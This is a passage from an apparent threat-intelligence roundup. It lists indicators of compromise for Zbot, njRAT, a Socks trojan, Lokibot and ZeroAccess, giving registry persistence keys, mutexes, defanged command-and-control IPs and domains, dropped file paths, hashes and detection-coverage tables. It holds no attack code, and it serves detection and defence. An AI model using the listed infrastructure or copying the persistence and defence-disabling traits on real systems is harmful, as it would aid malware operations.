\nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-HAKmpx9O84I/XbxdbHZJo2I/AAAAAAAAC38/_4iZQCmKcwo6GEB0WaEzsC9zgjt4SkYCgCLcBGAsYHQ/s1600/560532abb05b4b9219c6206d02defb4ce74f0f07be27173257df016e2576e0c1_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Zbot-7364099-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\\\DSP \nValue Name: ChangeNotice ` | 1 \nMutexes | Occurrences \n---|--- \n`-e2a38afdMutex` | 25 \n`FvLQ49Il\u00eeIyLjj6m` | 25 \n`FvLQ49Il IyLjj6m` | 21 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`204[.]79[.]197[.]200` | 25 \n`212[.]83[.]168[.]196` | 21 \n`199[.]2[.]137[.]29` | 21 \n`62[.]112[.]10[.]15` | 21 \n`13[.]107[.]21[.]200` | 13 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]wipmania[.]com` | 21 \n`n[.]alnisat[.]com` | 21 \n`n[.]jagalot[.]com` | 21 \n`n[.]myadvsit1[.]com` | 21 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Exoiom.exe` | 21 \n \n#### File Hashes\n\n` 0cb65d9d8421292e933acf4b5f8aebbe69fcdad0948f8bf711ebf8be9ca23392 0d2b2655e40f10215b306fd47028cf2dffada53d808fec0784514f5a896746d9 11246d210b2edc49c14b00f14791a22b5f2ec12c1be96ce90d5177769a489869 11c83400744d7f64516e1854772373f91b105e66169ba15d5d110f0948bed825 17ca554b2e2a1a6b9412cc2c3e29d6c95e27a24305e879beb1ec3ec6b504d526 1ae7050f136ee52bc82af58ea180ba449e47f1bfde4c27956906ac1ff1913998 25328cbd1c4325abcc27a6a1553fbfe029ca98b10747c2adc5ecee08eef77bc2 25e261c4a20575828b3344d872bd99725fceb952acecf524fa6c3c1267a2e729 2ca7fa29437a2caca2c10c4c347f73d8bb4fed5698a2f78c91b949420fd2b015 306e30cefb63944763afedf2f77f7c9d51d0bcda5d53068c5b832bee4e9bb7b4 31cf80b70149972f55f5064158359386cd1a1e8e3426cd1b9fa922ac994c47e7 3908a42cf0243c333fbd9d5cee753db2e8e44b8e26daabd0336ab3faca57136c 3f1a2e83de8d62377f9c1db5326cedff42b0b3ab6581dd1c8c3a4a52b9498ce9 43d34611fc97e74ee6d88b3b1fddbfd6b97fec6dae41208856e6e0cfbc921007 4453c2ac6b30f16a9560439c542dc42a17c723caab95e63289aa239017d002c1 4664d6a94aeca4dbdd5ec72453be28be2697546f4effc2579b6330b00942011a 519eab7ecc913297fa56b498685eb13e06a9375ba3cd7108057952639f8945bb 5295c963140c0b6022b1c9bb91401d2042ffb715d5a0af394546e788124b058d 5d53c88240b8ac76a3de5ba303bfa805f9730abc2827f149716c5a3ef9776fab 664aec540c5ad508b5b86c695ebd6e302cd67d7833abe56516365273f735a0b6 68fe7ccc046a6eb48d4bb9b6acf26ca7a22a7379fed0663e83f89492f4bc001a 76d7eb8843a1031e6498584e781934f6546b513658e345081e85f5c2ccee3459 794509058dd3ca5f5e6e1e775c24cd46573c7ed556184f3b67e28abd053167bc 7de6b27ba23da2c1d1ddfc54926b8a770a7da00908516e377c68140ebefa44d5 81bb7e47f2f07cae53dfa7a78ae94625bc49945a99a147b06da9b30f887981f0 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-0iLtt596xc4/Xbxd9OD_MLI/AAAAAAAAC4E/lbAwLKlURXcph7hr2MAHuASaijhVndwZACLcBGAsYHQ/s1600/81bb7e47f2f07cae53dfa7a78ae94625bc49945a99a147b06da9b30f887981f0_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.njRAT-7363922-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\S-1-5-21-2580483871-590521980-3826313501-500 \nValue Name: di ` | 21 \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 21 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 21 \n`<HKCU>\\SOFTWARE\\E99E462D99AD204BDF7D672852A4E30A \nValue Name: [kl] ` | 21 \n`<HKCU>\\SOFTWARE\\E99E462D99AD204BDF7D672852A4E30A ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: e99e462d99ad204bdf7d672852a4e30a ` | 7 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: e99e462d99ad204bdf7d672852a4e30a ` | 7 \nMutexes | Occurrences \n---|--- \n`e99e462d99ad204bdf7d672852a4e30a` | 21 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]22[.]2[.]84` | 14 \n`104[.]22[.]3[.]84` | 9 \n`95[.]185[.]232[.]120` | 1 \n`98[.]124[.]119[.]29` | 1 \n`41[.]141[.]118[.]138` | 1 \n`197[.]26[.]141[.]153` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`pastebin[.]com` | 21 \n`inforhack[.]ddns[.]net` | 3 \n`shadowhakar41[.]ddns[.]net` | 1 \n`osaam2015[.]ddns[.]net` | 1 \n`x5pqt[.]ddns[.]net` | 1 \n`server5319[.]us[.]to` | 1 \n`aqwe[.]ddns[.]net` | 1 \n`hx[.]ddns[.]net` | 1 \n`snokeall[.]ddns[.]net` | 1 \n`animeopening[.]ddns[.]net` | 1 \n`mrzero007[.]ddns[.]net` | 1 \n`sikipon32[.]ddns[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\dw.log` | 17 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 17 \n`%TEMP%\\svchost.exe` | 12 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\e99e462d99ad204bdf7d672852a4e30a.exe` | 6 \n`%APPDATA%\\svchost.exe` | 2 \n`%APPDATA%\\skype.exe` | 1 \n`%TEMP%\\8c0_appcompat.txt` | 1 \n`%HOMEPATH%\\svchost.exe` | 1 \n`%TEMP%\\dlhost.exe` | 1 \n`%HOMEPATH%\\Hex.exe` | 1 \n`%TEMP%\\Microsoft.exe` | 1 \n \n#### File Hashes\n\n` 059e82f8093d6cc96a0c9b256b91f29a76a504b31e7b99e505f00f1a58fb0fc8 0e456becd300e714371a779408d0e06c9e2d607e4e64357eddfa044a52c16640 2a167630a36ac40de7c8734db7020485e6437e48f7df33254702cdd8970128c0 51e4acbcc40cd882aaad099ae740e95657b309933898ba1d7008c457f0d75cdb 6001923be2f05f19e5061ddf5975f4b8c11f0085328434d6b1926c5a2c6485b9 6d377ec90f4ba0dd424381e05b48c7ed6e92dacc5e8ee3a154c4b770eeb52587 76c67ae939c6a9d187a0bdea6aaa6327984cd3e8de004835eb067ce4ec94ca1e 79fb56495974b83bc55b641f7a242206a539fcc028f66587f9e3c01e954f60b1 82af8835172e86cb143531abfaaf49ba71f5f82087c47bde81982e7f9fb4857a 836067675ad71d653ef9e8cedd07df5e6d15a41e7bc54cdbbaee2fc7764d9d2f 842865c8e038c4cf4da7c65a2c42379548009ddfedf206ac768f4fc443f3fae4 8c8ab50a5fffa135df8e2f8414a7862659dfec13742a511f9ca7f07348f3a44e 8df49f96d2f23b361c482dc331569827f4de5948cb95b426bf51c5f02d7574e5 92451c9eaec9049c6d787ec783bfacbaa20c4b95380b7247b540419c9b326a15 b56bdfb6b099cfe281a29e3d1f1a08d7fb4d56c0495dad8db010cb207ca73d67 ca1bc558e24135a5d6b79621ad7c236f6ca50c552bbc7b13d8b0d6feecf0a330 d788fe230c34a048d3a9b81464e72b62804447c046fc160ab920fda1ab168d56 e060f062be14913686fec255fae67e79f0042507701289fe8347d15206462df6 e4545c9397b09fa28bfd369bdc28babaee10ec05546bcd674263c0d24244aa07 f17ae58c267b7d0601014165e804580d0044134dc04b1ca50811275df0793ded f6d6b6fae736e1fc4d9bbb52704a7c84cc8bf4981f18ea466793f5aaf545d38a `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-l8k4qj3npM4/XbxeNiQYypI/AAAAAAAAC4M/tQxxSJQSHo4W55rLQ90tVJ_3XG2MOPYsQCLcBGAsYHQ/s1600/ca1bc558e24135a5d6b79621ad7c236f6ca50c552bbc7b13d8b0d6feecf0a330_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Socks-7363151-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ntuser ` | 24 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: autoload ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SCHEDULE \nValue Name: ImagePath ` | 24 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ntuser ` | 24 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: autoload ` | 24 \n`<HKLM>\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND ` | 24 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`208[.]100[.]26[.]251` | 24 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`fewfwe[.]net` | 24 \n`blinko-usa[.]com` | 24 \n`satellife[.]info` | 24 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\cftmon.exe` | 24 \n`%SystemRoot%\\SysWOW64\\drivers\\spools.exe` | 24 \n \n#### File Hashes\n\n` 0e9ce623b6d9979002c965f8d4b8379d16a3cdd71e64edfefb7b46546f760556 158b0aa2b4d23ab0c60e398eaffcc453d3b2135e9ac8501fc6fc8b0181f34916 19037ebfa382219b5a715a3190291091db8c4305cfcfb80ccf7ee6134f24ac2b 2c5f26e9971998e2989d69062df2b4947e52799f3b1e467eca922637cfc4b8a0 4772d7089ed885adeffe0c432f206e84a10038d93aea00713a0fef3ea204d61b 4ab819c524ad7e920bc7fedfce565676c6fdbc952e565bd42da7622456900f5b 4b39a3e4422ff108fbbeb5527524254eff540f48afcb882ef723c86760c01692 4d0b608d4816454ea7c615a51d24d20d25d3db7b424bea47956f3cf610c12a63 564cc6cf1fb9c7f23321ea597da0de78584f663faa3576cc25c876f0ced8539f 6451c75aa10348799759f004bb5f8cec4cab9ca59a243f74af6a92d994ff47ad 6bb0c35cf05218d0f843085b0da1dadead72bb6f3f08c72909c42875d177fac9 7299f47ff48a6286d1cd26a0b7d1e5233dd14af4cb7b1899538f9aa6661194ad 72ad21d29db21fd7519e226f0e50bd12a6c656b3ec14aed124555467373f09c4 748a55b6bb4144523e88a1a6795b22a445d30c142f06f869db1ea79ea879a6dd 8125c5f1f273ce5eafef48762c6886cb9df53a7dd5d41aad058afdab64256c9f 9814aae0363183ef5ae7d960da747db0dc5a644bae9e6f880c2b16f1b06f0de7 bbe846b00154658a2ce4701a08f085b806aebfebec60a5fc7b755bdb16f1db46 cec7f824501284e919c38d9161196136e527b67a8cb5066a2605995ec9833b94 cee25c0db7ab90aa3848e13013b2b02e82f101e473544ed802dc57242e54acfc cf8478480f7974884ce7a9d817b4ded724f2d1c77638273fbeaa3f086d1905ad d814df1c7a8edf3d4ce11091595ffd5d25b5a79de1891b39dc8ddfd8c00353c2 da967dec24f5455ed8910f3d7df93c60319fba735a29e2e09401db4b6b7a057c f713344d26bc5ad3d88efd93473acbbde824c4d4f0e1a70fb690d9bfe27a2bff f74c53738e554de22236498e91bef767351ac06a677eb2192ee09182eec203a4 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-gJNzd81eKTo/XbxeeM_mPEI/AAAAAAAAC4U/YmK8GP1qIS0FA7fT8u_3EhaXVDGwsVnAQCLcBGAsYHQ/s1600/6451c75aa10348799759f004bb5f8cec4cab9ca59a243f74af6a92d994ff47ad_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Lokibot-7363866-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\WINRAR ` | 3 \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003E9 \nValue Name: F ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000001F5 \nValue Name: F ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003EC \nValue Name: F ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8PKXHTYXYR ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: KV1LBH_H1V ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: JPXX3LNHNHY ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: PHLL54I ` | 1 \nMutexes | Occurrences \n---|--- \n`3749282D282E1E80C56CAE5A` | 12 \n`3BA87BBD1CC40F3583D46680` | 11 \n`8-3503835SZBFHHZ` | 4 \n`6M1O492E903A660D` | 4 \n`S-1-5-21-2580483-1060168328224` | 2 \n`Global\\ee9ec621-fa96-11e9-a007-00501e3ae7b5` | 1 \n`S-1-5-21-2580483-6362420053499` | 1 \n`S-1-5-21-2580483-19562420053499` | 1 \n`S-1-5-21-2580483-13882420053499` | 1 \n`S-1-5-21-2580483-11682420053499` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]247[.]73[.]132` | 10 \n`62[.]149[.]128[.]45` | 2 \n`198[.]54[.]117[.]200` | 2 \n`47[.]91[.]169[.]15` | 2 \n`198[.]49[.]23[.]144/31` | 2 \n`172[.]80[.]15[.]9` | 2 \n`185[.]149[.]23[.]24` | 2 \n`45[.]43[.]35[.]96/31` | 2 \n`213[.]186[.]33[.]5` | 1 \n`50[.]63[.]202[.]52` | 1 \n`91[.]195[.]240[.]126` | 1 \n`23[.]20[.]239[.]12` | 1 \n`184[.]168[.]131[.]241` | 1 \n`52[.]58[.]78[.]16` | 1 \n`81[.]88[.]57[.]68` | 1 \n`183[.]90[.]245[.]41` | 1 \n`162[.]213[.]255[.]220` | 1 \n`162[.]211[.]181[.]225` | 1 \n`213[.]239[.]221[.]71` | 1 \n`198[.]54[.]117[.]218` | 1 \n`173[.]247[.]243[.]182` | 1 \n`203[.]238[.]182[.]106` | 1 \n`103[.]75[.]189[.]246` | 1 \n`77[.]72[.]0[.]138` | 1 \n`69[.]16[.]230[.]43` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`devhaevents[.]us` | 10 \n`www[.]nadidetadllar[.]com` | 3 \n`28080[.]com` | 2 \n`www[.]peizi33[.]com` | 2 \n`www[.]zgtmn[.]com` | 2 \n`www[.]neurofoodmarketing[.]com` | 2 \n`www[.]dc-eas[.]com` | 2 \n`www[.]wls11[.]com` | 2 \n`www[.]the-conference-buddies[.]com` | 2 \n`www[.]parapuglia[.]com` | 2 \n`www[.]wemovieblog[.]info` | 2 \n`www[.]browneyedbakerfun[.]com` | 2 \n`www[.]zjko2o[.]com` | 2 \n`www[.]cryptogage[.]com` | 2 \n`cn-list[.]info` | 2 \n`www[.]xn--u2u404a[.]ink` | 2 \n`www[.]stvple[.]com` | 2 \n`www[.]ledean-pauvert[.]com` | 2 \n`www[.]ms-field[.]net` | 2 \n`www[.]2zh4m[.]com` | 1 \n`www[.]66463dh[.]com` | 1 \n`www[.]moveoptimizer[.]com` | 1 \n`www[.]onmyoji-kouryaku[.]com` | 1 \n`www[.]1399pk10[.]com` | 1 \n`mindslaver[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\D282E1\\1E80C5.lck` | 12 \n`%APPDATA%\\Microsoft\\Crypto\\RSA\\S-1-5-21-2580483871-590521980-3826313501-500\\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 12 \n`%APPDATA%\\D1CC40\\0F3583.lck` | 11 \n`%APPDATA%\\Microsoft\\Crypto\\RSA\\S-1-5-21-1258710499-2222286471-4214075941-500\\a18ca4003deb042bbee7a40f15e1970b_8f793a96-da80-4751-83f9-b23d8b735fb1` | 11 \n`%TEMP%\\bill file.exe` | 11 \n`%APPDATA%\\D1CC40\\0F3583.exe (copy)` | 9 \n`%APPDATA%\\D282E1` | 7 \n`%APPDATA%\\6M1O492E\\6M1logim.jpeg` | 7 \n`%APPDATA%\\6M1O492E\\6M1logrc.ini` | 7 \n`%APPDATA%\\6M1O492E\\6M1logri.ini` | 7 \n`%APPDATA%\\D1CC40\\0F3583.hdb` | 5 \n`%APPDATA%\\6M1O492E\\6M1logrv.ini` | 4 \n`%System32%\\Tasks\\Attractableness` | 3 \n`%ProgramData%\\hellderbind.exe` | 3 \n`%ProgramData%\\HELLDE~1.EXE` | 2 \n`\\Documents and Settings\\All Users\\hellderbind.exe` | 2 \n`%SystemRoot%\\Tasks\\Attractableness.job` | 2 \n`%TEMP%\\A1ED.dmp` | 1 \n`%TEMP%\\8D7A.dmp` | 1 \n`%TEMP%\\bin.exe` | 1 \n`%APPDATA%\\-L951SVT\\-L9logim.jpeg` | 1 \n`%APPDATA%\\-L951SVT\\-L9logrc.ini` | 1 \n`%APPDATA%\\-L951SVT\\-L9logri.ini` | 1 \n`%TEMP%\\52843.bat` | 1 \n`%ProgramFiles(x86)%\\Dmdvpl4r8\\IconCacheebvhjrz.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0b1ec867f89cabea9e5a4750f7c7ba76ba255b417341b13351bde26733827d5e 124f01bbbcc20d33191c4d2bb756d7b4be9fd98b1c18dd0bafc2f5a1a0119a7c 1536d75683e29eb947bd08c622687c23e96b0a5b7192650d2c0e0b71b523f53b 3199c726488205e1e39d826666ddb14e567283dc1912b94688bf80623e3bb8b1 46d599a3253021c45a373cd9f324d1fe9b97a28a9b2ca57685621557296a736f 4a7483bd09d881a0c9b94077d2fa308eebcd44988dabf866b481c9dfd4d211da 68e514e18e7353c018dd48e6f237e5f7c57def18a357156ffca7dd3826ee7426 72b2e6a534b504d1e5871293956412bf8b198ae71139312592755bfe8a5cbfab 7a675a25cd30dc40dba8e32cbdc499089dcbc5a994150d8466497f14619ae6ba 8e89f43a20be6022d88e7ba6821a91e5f2ade5882ba8de7e86e449ba497e56cc c4294beaabec49ed4dede08037b48667ac91dbf9eb4cff60e987b1906d7e35f1 ca5eeac3a04231f26f71646ec3f62c867d42fef71dcd677cb4e2a01a986a80eb d0a46670613cb3711bb0c690f75768640e6867b53ee2866f1952bb3b39436f59 dbe53d918accbf4b75025ad3b525ebce8547c913808ef547e8b9d67114113b1c f966a33cbaba9b97cb874d8b8d17544c856db7544c7bb2a09d3d2535a8e28fd5 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-xCcGqnivNxQ/XbxewjTnGbI/AAAAAAAAC4c/WdI40J-Cu4AQ4_GC7FTbxcPKhUfX3uM1ACLcBGAsYHQ/s1600/46d599a3253021c45a373cd9f324d1fe9b97a28a9b2ca57685621557296a736f_amp.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-kK37vBh0HN0/Xbxe0w5yovI/AAAAAAAAC4g/bgJBe457GSQb6TElE8YyWN9LkCvWVV7HwCLcBGAsYHQ/s1600/46d599a3253021c45a373cd9f324d1fe9b97a28a9b2ca57685621557296a736f_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Zeroaccess-7358361-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BROWSER \nValue Name: Start ` | 21 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BFE \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BFE \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BFE \nValue Name: ErrorControl ` | 21 \nMutexes | Occurrences \n---|--- \n`Global\\82f0e161-f7c1-11e9-a007-00501e3ae7b5` | 1 \n`Global\\a280e5c1-f7c1-11e9-a007-00501e3ae7b5` | 1 \n`Global\\d6367241-f7c1-11e9-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`83[.]133[.]123[.]20` | 14 \n`212[.]253[.]253[.]254` | 9 \n`218[.]144[.]173[.]167` | 8 \n`98[.]248[.]140[.]174` | 7 \n`76[.]119[.]18[.]160` | 6 \n`82[.]130[.]158[.]137` | 6 \n`24[.]222[.]83[.]135` | 6 \n`1[.]161[.]150[.]169` | 6 \n`65[.]36[.]75[.]132` | 6 \n`50[.]7[.]216[.]66` | 5 \n`166[.]82[.]93[.]190` | 5 \n`36[.]2[.]141[.]192` | 5 \n`184[.]90[.]23[.]168` | 4 \n`72[.]189[.]202[.]136` | 4 \n`37[.]19[.]241[.]169` | 4 \n`31[.]134[.]253[.]187` | 4 \n`110[.]226[.]47[.]156` | 4 \n`74[.]88[.]57[.]193` | 4 \n`184[.]38[.]240[.]175` | 4 \n`5[.]43[.]242[.]139` | 4 \n`152[.]7[.]6[.]164` | 4 \n`190[.]105[.]127[.]197` | 4 \n`98[.]69[.]146[.]176` | 4 \n`86[.]124[.]234[.]155` | 4 \n`80[.]116[.]95[.]189` | 4 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`j[.]maxmind[.]com` | 21 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\LogFiles\\Scm\\e22a8667-f75b-4ba9-ba46-067ed4429de8` | 21 \n`\\@` | 21 \n`\\L\\eexoxfxs` | 21 \n`\\systemroot\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}` | 16 \n`\\systemroot\\system32\\services.exe` | 16 \n`%System32%\\services.exe` | 16 \n`%SystemRoot%\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}\\@` | 16 \n`%SystemRoot%\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}\\L` | 16 \n`%SystemRoot%\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}\\U` | 16 \n`\\systemroot\\assembly\\GAC_32\\Desktop.ini` | 5 \n`\\systemroot\\assembly\\GAC_64\\Desktop.ini` | 5 \n`\\$Recycle.Bin\\S-1-5-18` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\@` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\L` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\U` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\n` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\@` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\L` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\U` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\n` | 5 \n`\\RECYCLER\\S-1-5-18\\$ad714f5b8798518b3ccb73fd900fd2ba\\@` | 3 \n`\\RECYCLER\\S-1-5-18\\$ad714f5b8798518b3ccb73fd900fd2ba\\n` | 3 \n`\\RECYCLER\\S-1-5-21-1258710499-2222286471-4214075941-500\\$ad714f5b8798518b3ccb73fd900fd2ba\\@` | 3 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0698b0699a2832438d3d40b9b254a1db6997650030a4f1baa9d83b195ddcefee 2a4480ab660655f0667496d06a8a6c4ca40795ea673a1d8be36c185fcd5843a2 2ff6a5a8fb138d625121b218c791129fdac013f6cea1fc4cac9a8f986a43a17e 61fe63c712ac33630cca861ad8bc3283d9e591a61184cf0c2e40e1712880e858 68073e04dff2910046705b41823a3d2e22de0b80722b2e0642f8bbad2251f31b 6c0cfbb2a0f755be5e73f9eebf0af5a66a8a9ccd9f064742275c45911aa4ba05 73efae80e8a1433ecce908d9d89a7e0dee9689f9e41a43858b7dd020ad98bdbb 81af3ef292ab1ca88658434c67ba4433727b2fa52c6170689cc7e6987d52e994 82c17d05d449adc7970c6d923a00567228d2f92d784e17e46fd40fb5f75fc96c 